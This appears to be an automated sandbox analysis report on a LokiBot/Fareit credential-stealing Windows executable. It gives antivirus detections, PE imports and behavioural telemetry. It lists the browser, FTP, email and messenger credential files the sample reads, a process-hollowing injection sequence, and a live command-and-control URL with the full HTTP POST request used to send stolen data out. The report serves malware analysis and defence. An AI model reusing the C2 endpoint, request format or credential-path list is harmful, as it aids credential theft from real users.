10.6
0-day

1605653f82f11b2142c15aa911538d510450a727275ffe42099b63e3da002089

9161252bac3c4292edae98a147ba9285.exe

Analysis duration

74s

Last analysis

File size

598.0KB
Static detection: malicious. Dynamic detection: malicious. Detection tags: 100% AGEN AGENTTESLA AI SCORE=84 AIDETECTVM AUTO BTBGMS CLASSIC CONFIDENCE DELF DELPHILESS ELKP ELOY FAREIT GENERICKDZ HIGH CONFIDENCE HJEDQX IGENT KRYPTIK LG0@AAWQSSFI LOKIBOT MALWARE2 MALWARE@#2OVHANU9DYBWZ NQOE PUTTY QVM05 R + MAL R06EC0DI220 SCORE STATIC AI SUSGEN SUSPICIOUS PE TRJGEN TSCOPE UNSAFE WACATAC X2059 ZELPHIF
Eagle Eye engine
Not detected: no Eagle Eye engine detection results yet
Static verdict
Antivirus engines
Engine Result Detection time Engine version
Alibaba Trojan:Win32/LokiBot.5c6e83df 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:Malware-gen 20201228 21.1.5827.0
Tencent Win32.Backdoor.Fareit.Auto 20201228 1.0.0.1
Kingsoft 20201228 2017.9.26.565
McAfee Fareit-FSK!9161252BAC3C 20201228 6.0.6.653
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
Static indicators
Queries for the computer name (1 event)
Time & API Arguments Status Return Repeated
1619686140.650246
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Tries to locate where the browsers are installed (1 event)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Checks the amount of memory in the system; this can be used to detect virtual machines that have a low amount of memory available (1 event)
Time & API Arguments Status Return Repeated
1619686138.932246
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)
section CODE
section DATA
section BSS
The executable uses a known packer (1 event)
packer BobSoft Mini Delphi -> BoB / BobSoft
One or more processes crashed (1 event)
Time & API Arguments Status Return Repeated
1619686137.010822
__exception__
stacktrace:
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 34733888
registers.edi: 0
registers.eax: 0
registers.ebp: 34733960
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6
exception.instruction_r: f7 f0 33 c0 5a 59 59 64 89 10 eb 5e e9 de 9b fa
exception.symbol: 9161252bac3c4292edae98a147ba9285+0x599bd
exception.instruction: div eax
exception.module: 9161252bac3c4292edae98a147ba9285.exe
exception.exception_code: 0xc0000094
exception.offset: 367037
exception.address: 0x4599bd
success 0 0
Behavioral verdict
Dynamic indicators
One or more potentially interesting buffers were extracted; these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)
suspicious_features POST method with no referer header, HTTP version 1.0 used
suspicious_request POST http://mahetechasia.com/data/five/fre.php
Performs some HTTP requests (1 event)
request POST http://mahetechasia.com/data/five/fre.php
Sends data using the HTTP POST Method (1 event)
request POST http://mahetechasia.com/data/five/fre.php
Allocates read-write-execute memory (usually to unpack itself) (3 events)
Time & API Arguments Status Return Repeated
1619686136.822822
NtAllocateVirtualMemory
process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003d0000
success 0 0
1619686137.010822
NtAllocateVirtualMemory
process_identifier: 2296
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00530000
success 0 0
1619686137.025822
NtAllocateVirtualMemory
process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00780000
success 0 0
Steals private information from local Internet browsers (19 events)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
The binary likely contains encrypted or compressed data indicative of a packer (3 events)
entropy 7.565652478268402 section {'size_of_data': '0x0000d000', 'virtual_address': '0x0005a000', 'entropy': 7.565652478268402, 'name': 'DATA', 'virtual_size': '0x0000ce20'} description A section with a high entropy has been found
entropy 7.192305566278029 section {'size_of_data': '0x00026c00', 'virtual_address': '0x00074000', 'entropy': 7.192305566278029, 'name': '.rsrc', 'virtual_size': '0x00026bec'} description A section with a high entropy has been found
entropy 0.34673366834170855 description Overall entropy of this PE file is high
Network communication
Communicates with host for which no DNS query was performed (1 event)
host 172.217.24.14
Harvests credentials from local FTP client software (22 events)
file C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\wcx_ftp.ini
file C:\Windows\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\wcx_ftp.ini
file C:\Windows\32BitFtp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Program Files (x86)\FileZilla\Filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Ghisler\Total Commander
registry HKEY_CURRENT_USER\Software\VanDyke\SecureFX
registry HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
registry HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
registry HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
registry HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
registry HKEY_CURRENT_USER\Software\Martin Prikryl
registry HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Harvests information related to installed instant messenger clients (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local email clients (3 events)
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
Used NtSetContextThread to modify a thread in a remote process, indicative of process injection (2 events)
Process injection Process 2296 called NtSetContextThread to modify thread in remote process 1432
Time & API Arguments Status Return Repeated
1619686137.775822
NtSetContextThread
thread_handle: 0x000000fc
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 1432
success 0 0
Putty Files, Registry Keys and/or Mutexes Detected
Resumed a suspended thread in a remote process, potentially indicative of process injection (2 events)
Process injection Process 2296 resumed a thread in remote process 1432
Time & API Arguments Status Return Repeated
1619686138.150822
NtResumeThread
thread_handle: 0x000000fc
suspend_count: 1
process_identifier: 1432
success 0 0
Executed a process and injected code into it, probably while unpacking (7 events)
Time & API Arguments Status Return Repeated
1619686137.744822
CreateProcessInternalW
thread_identifier: 2468
thread_handle: 0x000000fc
process_identifier: 1432
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\9161252bac3c4292edae98a147ba9285.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619686137.744822
NtUnmapViewOfSection
process_identifier: 1432
region_size: 4096
process_handle: 0x00000100
base_address: 0x00400000
success 0 0
1619686137.760822
NtMapViewOfSection
section_handle: 0x00000108
process_identifier: 1432
commit_size: 663552
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000100
allocation_type: 0 ()
section_offset: 0
view_size: 663552
base_address: 0x00400000
success 0 0
1619686137.775822
NtGetContextThread
thread_handle: 0x000000fc
success 0 0
1619686137.775822
NtSetContextThread
thread_handle: 0x000000fc
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 1432
success 0 0
1619686138.150822
NtResumeThread
thread_handle: 0x000000fc
suspend_count: 1
process_identifier: 1432
success 0 0
1619686139.463246
NtResumeThread
thread_handle: 0x00000110
suspend_count: 1
process_identifier: 1432
success 0 0
File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 events)
Bkav W32.AIDetectVM.malware2
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.66706
FireEye Generic.mg.9161252bac3c4292
Qihoo-360 Generic/HEUR/QVM05.1.C0C7.Malware.Gen
ALYac Spyware.LokiBot
Cylance Unsafe
Sangfor Malware
K7AntiVirus Trojan ( 005653ce1 )
Alibaba Trojan:Win32/LokiBot.5c6e83df
K7GW Trojan ( 005653ce1 )
Cybereason malicious.bac3c4
Arcabit Trojan.Generic.D10492
Cyren W32/Delf.NQOE-7492
Symantec Trojan.Gen.2
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan.Win32.Crypt.gen
BitDefender Trojan.GenericKDZ.66706
NANO-Antivirus Trojan.Win32.TrjGen.hjedqx
AegisLab Trojan.Multi.Generic.4!c
Avast Win32:Malware-gen
Tencent Win32.Backdoor.Fareit.Auto
Ad-Aware Trojan.GenericKDZ.66706
Sophos Mal/Generic-R + Mal/Fareit-AA
Comodo Malware@#2ovhanu9dybwz
F-Secure Heuristic.HEUR/AGEN.1136310
DrWeb Trojan.PWS.Stealer.23680
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R06EC0DI220
McAfee-GW-Edition BehavesLike.Win32.Fareit.hc
Emsisoft Trojan.GenericKDZ.66706 (B)
SentinelOne Static AI - Suspicious PE
Jiangmin Trojan.Crypt.dcg
Avira HEUR/AGEN.1136310
Antiy-AVL Trojan/Win32.Wacatac
Gridinsoft Trojan.Win32.Kryptik.ba!s1
Microsoft Trojan:Win32/LokiBot.AG!MTB
ZoneAlarm HEUR:Trojan.Win32.Crypt.gen
GData Trojan.GenericKDZ.66706
Cynet Malicious (score: 100)
AhnLab-V3 Suspicious/Win.Delphiless.X2059
Acronis suspicious
McAfee Fareit-FSK!9161252BAC3C
MAX malware (ai score=84)
VBA32 TScope.Trojan.Delf
Malwarebytes Spyware.AgentTesla
Zoner Trojan.Win32.89576
ESET-NOD32 a variant of Win32/Injector.ELOY
TrendMicro-HouseCall TROJ_GEN.R06EC0DI220
Visual analysis
Binary image
No binary image: no binary visualization image was generated for this sample
Runtime screenshots
No runtime screenshots: no screenshots were generated while this sample ran


PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x46813c VirtualFree
0x468140 VirtualAlloc
0x468144 LocalFree
0x468148 LocalAlloc
0x46814c GetVersion
0x468150 GetCurrentThreadId
0x46815c VirtualQuery
0x468160 WideCharToMultiByte
0x468164 MultiByteToWideChar
0x468168 lstrlenA
0x46816c lstrcpynA
0x468170 LoadLibraryExA
0x468174 GetThreadLocale
0x468178 GetStartupInfoA
0x46817c GetProcAddress
0x468180 GetModuleHandleA
0x468184 GetModuleFileNameA
0x468188 GetLocaleInfoA
0x46818c GetCommandLineA
0x468190 FreeLibrary
0x468194 FindFirstFileA
0x468198 FindClose
0x46819c ExitProcess
0x4681a0 WriteFile
0x4681a8 RtlUnwind
0x4681ac RaiseException
0x4681b0 GetStdHandle
Library user32.dll:
0x4681b8 GetKeyboardType
0x4681bc LoadStringA
0x4681c0 MessageBoxA
0x4681c4 CharNextA
Library advapi32.dll:
0x4681cc RegQueryValueExA
0x4681d0 RegOpenKeyExA
0x4681d4 RegCloseKey
Library oleaut32.dll:
0x4681dc SysFreeString
0x4681e0 SysReAllocStringLen
0x4681e4 SysAllocStringLen
Library kernel32.dll:
0x4681ec TlsSetValue
0x4681f0 TlsGetValue
0x4681f4 LocalAlloc
0x4681f8 GetModuleHandleA
Library advapi32.dll:
0x468200 RegQueryValueExA
0x468204 RegOpenKeyExA
0x468208 RegCloseKey
Library kernel32.dll:
0x468210 lstrcpyA
0x468214 WriteFile
0x46821c WaitForSingleObject
0x468220 VirtualQuery
0x468224 VirtualAlloc
0x468228 Sleep
0x46822c SizeofResource
0x468230 SetThreadLocale
0x468234 SetFilePointer
0x468238 SetEvent
0x46823c SetErrorMode
0x468240 SetEndOfFile
0x468244 ResetEvent
0x468248 ReadFile
0x46824c MulDiv
0x468250 LockResource
0x468254 LoadResource
0x468258 LoadLibraryA
0x468264 GlobalUnlock
0x468268 GlobalReAlloc
0x46826c GlobalHandle
0x468270 GlobalLock
0x468274 GlobalFree
0x468278 GlobalFindAtomA
0x46827c GlobalDeleteAtom
0x468280 GlobalAlloc
0x468284 GlobalAddAtomA
0x468288 GetVersionExA
0x46828c GetVersion
0x468290 GetTickCount
0x468294 GetThreadLocale
0x46829c GetSystemTime
0x4682a0 GetSystemInfo
0x4682a4 GetStringTypeExA
0x4682a8 GetStdHandle
0x4682ac GetProcAddress
0x4682b0 GetModuleHandleA
0x4682b4 GetModuleFileNameA
0x4682b8 GetLocaleInfoA
0x4682bc GetLocalTime
0x4682c0 GetLastError
0x4682c4 GetFullPathNameA
0x4682c8 GetDiskFreeSpaceA
0x4682cc GetDateFormatA
0x4682d0 GetCurrentThreadId
0x4682d4 GetCurrentProcessId
0x4682d8 GetCPInfo
0x4682dc GetACP
0x4682e0 FreeResource
0x4682e4 InterlockedExchange
0x4682e8 FreeLibrary
0x4682ec FormatMessageA
0x4682f0 FindResourceA
0x4682f8 ExitThread
0x4682fc EnumCalendarInfoA
0x468308 CreateThread
0x46830c CreateFileA
0x468310 CreateEventA
0x468314 CompareStringA
0x468318 CloseHandle
Library version.dll:
0x468320 VerQueryValueA
0x468328 GetFileVersionInfoA
Library gdi32.dll:
0x468330 UnrealizeObject
0x468334 StretchBlt
0x468338 SetWindowOrgEx
0x46833c SetWinMetaFileBits
0x468340 SetViewportOrgEx
0x468344 SetTextColor
0x468348 SetStretchBltMode
0x46834c SetROP2
0x468350 SetPixel
0x468354 SetEnhMetaFileBits
0x468358 SetDIBColorTable
0x46835c SetBrushOrgEx
0x468360 SetBkMode
0x468364 SetBkColor
0x468368 SelectPalette
0x46836c SelectObject
0x468370 SaveDC
0x468374 RestoreDC
0x468378 Rectangle
0x46837c RectVisible
0x468380 RealizePalette
0x468384 PlayEnhMetaFile
0x468388 PathToRegion
0x46838c PatBlt
0x468390 MoveToEx
0x468394 MaskBlt
0x468398 LineTo
0x46839c IntersectClipRect
0x4683a0 GetWindowOrgEx
0x4683a4 GetWinMetaFileBits
0x4683a8 GetTextMetricsA
0x4683b4 GetStockObject
0x4683b8 GetPixel
0x4683bc GetPaletteEntries
0x4683c0 GetObjectA
0x4683cc GetEnhMetaFileBits
0x4683d0 GetDeviceCaps
0x4683d4 GetDIBits
0x4683d8 GetDIBColorTable
0x4683dc GetDCOrgEx
0x4683e4 GetClipBox
0x4683e8 GetBrushOrgEx
0x4683ec GetBitmapBits
0x4683f0 ExcludeClipRect
0x4683f4 DeleteObject
0x4683f8 DeleteEnhMetaFile
0x4683fc DeleteDC
0x468400 CreateSolidBrush
0x468404 CreatePenIndirect
0x468408 CreatePalette
0x468410 CreateFontIndirectA
0x468414 CreateDIBitmap
0x468418 CreateDIBSection
0x46841c CreateCompatibleDC
0x468424 CreateBrushIndirect
0x468428 CreateBitmap
0x46842c CopyEnhMetaFileA
0x468430 BitBlt
Library user32.dll:
0x468438 CreateWindowExA
0x46843c WindowFromPoint
0x468440 WinHelpA
0x468444 WaitMessage
0x468448 UpdateWindow
0x46844c UnregisterClassA
0x468450 UnhookWindowsHookEx
0x468454 TranslateMessage
0x46845c TrackPopupMenu
0x468464 ShowWindow
0x468468 ShowScrollBar
0x46846c ShowOwnedPopups
0x468470 ShowCursor
0x468474 SetWindowsHookExA
0x468478 SetWindowPos
0x46847c SetWindowPlacement
0x468480 SetWindowLongA
0x468484 SetTimer
0x468488 SetScrollRange
0x46848c SetScrollPos
0x468490 SetScrollInfo
0x468494 SetRect
0x468498 SetPropA
0x46849c SetParent
0x4684a0 SetMenuItemInfoA
0x4684a4 SetMenu
0x4684a8 SetForegroundWindow
0x4684ac SetFocus
0x4684b0 SetCursor
0x4684b4 SetClassLongA
0x4684b8 SetCapture
0x4684bc SetActiveWindow
0x4684c0 SendMessageA
0x4684c4 ScrollWindow
0x4684c8 ScreenToClient
0x4684cc RemovePropA
0x4684d0 RemoveMenu
0x4684d4 ReleaseDC
0x4684d8 ReleaseCapture
0x4684e4 RegisterClassA
0x4684e8 RedrawWindow
0x4684ec PtInRect
0x4684f0 PostQuitMessage
0x4684f4 PostMessageA
0x4684f8 PeekMessageA
0x4684fc OffsetRect
0x468500 OemToCharA
0x468504 MessageBoxA
0x468508 MapWindowPoints
0x46850c MapVirtualKeyA
0x468510 LoadStringA
0x468514 LoadKeyboardLayoutA
0x468518 LoadIconA
0x46851c LoadCursorA
0x468520 LoadBitmapA
0x468524 KillTimer
0x468528 IsZoomed
0x46852c IsWindowVisible
0x468530 IsWindowEnabled
0x468534 IsWindow
0x468538 IsRectEmpty
0x46853c IsIconic
0x468540 IsDialogMessageA
0x468544 IsChild
0x468548 InvalidateRect
0x46854c IntersectRect
0x468550 InsertMenuItemA
0x468554 InsertMenuA
0x468558 InflateRect
0x468560 GetWindowTextA
0x468564 GetWindowRect
0x468568 GetWindowPlacement
0x46856c GetWindowLongA
0x468570 GetWindowDC
0x468574 GetTopWindow
0x468578 GetSystemMetrics
0x46857c GetSystemMenu
0x468580 GetSysColorBrush
0x468584 GetSysColor
0x468588 GetSubMenu
0x46858c GetScrollRange
0x468590 GetScrollPos
0x468594 GetScrollInfo
0x468598 GetPropA
0x46859c GetParent
0x4685a0 GetWindow
0x4685a4 GetMenuStringA
0x4685a8 GetMenuState
0x4685ac GetMenuItemInfoA
0x4685b0 GetMenuItemID
0x4685b4 GetMenuItemCount
0x4685b8 GetMenu
0x4685bc GetLastActivePopup
0x4685c0 GetKeyboardState
0x4685c8 GetKeyboardLayout
0x4685cc GetKeyState
0x4685d0 GetKeyNameTextA
0x4685d4 GetIconInfo
0x4685d8 GetForegroundWindow
0x4685dc GetFocus
0x4685e0 GetDlgItem
0x4685e4 GetDesktopWindow
0x4685e8 GetDCEx
0x4685ec GetDC
0x4685f0 GetCursorPos
0x4685f4 GetCursor
0x4685f8 GetClipboardData
0x4685fc GetClientRect
0x468600 GetClassNameA
0x468604 GetClassInfoA
0x468608 GetCapture
0x46860c GetActiveWindow
0x468610 FrameRect
0x468614 FindWindowA
0x468618 FillRect
0x46861c EqualRect
0x468620 EnumWindows
0x468624 EnumThreadWindows
0x468628 EndPaint
0x46862c EnableWindow
0x468630 EnableScrollBar
0x468634 EnableMenuItem
0x468638 DrawTextA
0x46863c DrawMenuBar
0x468640 DrawIconEx
0x468644 DrawIcon
0x468648 DrawFrameControl
0x46864c DrawFocusRect
0x468650 DrawEdge
0x468654 DispatchMessageA
0x468658 DestroyWindow
0x46865c DestroyMenu
0x468660 DestroyIcon
0x468664 DestroyCursor
0x468668 DeleteMenu
0x46866c DefWindowProcA
0x468670 DefMDIChildProcA
0x468674 DefFrameProcA
0x468678 CreatePopupMenu
0x46867c CreateMenu
0x468680 CreateIcon
0x468684 ClientToScreen
0x468688 CheckMenuItem
0x46868c CallWindowProcA
0x468690 CallNextHookEx
0x468694 BeginPaint
0x468698 CharNextA
0x46869c CharLowerBuffA
0x4686a0 CharLowerA
0x4686a4 CharToOemA
0x4686a8 AdjustWindowRectEx
Library kernel32.dll:
0x4686b4 Sleep
Library oleaut32.dll:
0x4686bc SafeArrayPtrOfIndex
0x4686c0 SafeArrayGetUBound
0x4686c4 SafeArrayGetLBound
0x4686c8 SafeArrayCreate
0x4686cc VariantChangeType
0x4686d0 VariantCopy
0x4686d4 VariantClear
0x4686d8 VariantInit
Library comctl32.dll:
0x4686e8 ImageList_Write
0x4686ec ImageList_Read
0x4686fc ImageList_DragMove
0x468700 ImageList_DragLeave
0x468704 ImageList_DragEnter
0x468708 ImageList_EndDrag
0x46870c ImageList_BeginDrag
0x468710 ImageList_Remove
0x468714 ImageList_DrawEx
0x468718 ImageList_Draw
0x468728 ImageList_Add
0x468730 ImageList_Destroy
0x468734 ImageList_Create
Library comdlg32.dll:
0x46873c GetSaveFileNameA
0x468740 GetOpenFileNameA

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49176 50.17.5.224 mahetechasia.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702
192.168.56.101 62192 239.255.255.250 3702
192.168.56.101 65005 239.255.255.250 3702
192.168.56.101 65007 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://mahetechasia.com/data/five/fre.php
POST /data/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: mahetechasia.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 902AECAC
Content-Length: 196
Connection: close

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.